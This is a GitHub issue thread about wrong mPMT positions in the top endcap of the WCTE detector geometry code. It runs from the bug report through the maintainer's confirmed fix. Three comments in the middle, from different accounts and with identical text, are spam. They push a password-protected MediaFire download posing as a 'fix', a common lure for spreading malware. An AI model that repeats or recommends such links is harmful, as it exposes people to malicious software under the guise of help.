### ISSUE TITLE
Incorrect mPMT positions in top cap?

### ISSUE THREAD

**Issue by kmtsui** [WCTE/Geometry#1]
Looks like `offsets` from bottom endcap, which has special treatment for FD mPMTs, are wrongly used in top endcap?

https://github.com/WCTE/Geometry/blob/f22e38ca44a1f9e2925f35120a02e0c9ea18c283/Geometry/SM.py#L85
https://github.com/WCTE/Geometry/blob/f22e38ca44a1f9e2925f35120a02e0c9ea18c283/Geometry/SM.py#L193

**Comment by ESMELSTEPHANE24** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deankarlen** [comment]
> Looks like `offsets` from bottom endcap, which has special treatment for FD mPMTs, are wrongly used in top endcap?
> 
> https://github.com/WCTE/Geometry/blob/f22e38ca44a1f9e2925f35120a02e0c9ea18c283/Geometry/SM.py#L85
> 
> https://github.com/WCTE/Geometry/blob/f22e38ca44a1f9e2925f35120a02e0c9ea18c283/Geometry/SM.py#L193

Thank you Ka Ming for letting me know. I have fixed the code. See:

https://github.com/WCTE/Geometry/commit/5be466285ee87ea5ad7e9239b5f4560642364c1e

I guess I would have found this bug once we had survey data - but it is nice to sort this out in advance!
